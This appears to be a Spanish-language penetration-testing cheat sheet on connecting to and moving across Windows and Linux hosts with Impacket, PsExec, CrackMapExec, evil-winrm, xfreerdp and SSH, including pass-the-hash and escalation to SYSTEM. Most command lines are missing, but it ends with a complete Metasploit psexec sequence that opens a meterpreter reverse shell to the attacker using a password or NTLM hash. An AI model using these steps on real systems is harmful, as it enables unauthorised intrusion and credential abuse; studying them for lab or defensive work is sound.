También podemos usar la opción --system para obtener privilegios de SYSTEM.
PsExec
Impacket posee un script en python que nos permite conectarnos a equipos Windows:
Si la máquina atacante es Kali, el script se encuentra en /usr/share/doc/python3-impacket/examples.
Si tenemos un hash, podemos hacer un pass-the-hash con el siguiente comando:
Windows posee la herramienta PsExec, con la cual, podemos escalar de una shell con privilegios de administrador a una de SYSTEM (o de cuentas de servicio):
Abrimos Metasploit:
Usamos el módulo de psexec:
CrackMapExec
Ejecución de comandos usando la contraseña:
Si queremos hacer pass-the-hash, usamos el siguiente comando:
Ejecución de comandos usando la contraseña:
Si queremos hacer pass-the-hash, usamos el siguiente comando:
WinRM (puerto 5985)
Podemos usar la herramienta evil-winrm para conectarnos al servicio WinRM.
Para instalar evil-winrm en Kali, usamos el siguiente comando:
De la siguiente forma se puede obtener una shell mediante este servicio:
Si tenemos el hash del usuario, podemos hacer pass-the-hash:
RDP
Podemos usar xfreerdp para conectarnos a la máquina remota:
Podemos hacerlo usando pass-the-hash:
Podemos usar las siguientes opciones para permitir copiar y pegar desde el clipboard, ajuste automático del tamaño de la pantalla, y anclar un directorio:
SSH
Para conectarnos al puerto por defecto de SSH, usamos el siguiente comando:
Si el puerto es otro, tenemos que usar la opción -p:
En caso de tener una llave de conexión, usamos la opción -i:
Para pasar la contraseña junto con el usuario, debemos usar la herramienta sshpass.
Para instalar sshpass, usamos el siguiente comando:
sshpass se usa de la siguiente forma:
Si necesitamos mandar comandos sobre SSH, estos deben ir al final del comando SSH:
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST <local_ip>
set LPORT <local_port>
set RHOST <target_ip>
set SMBUser <username>
set SMBPass <hash_ntlm/password>
exploit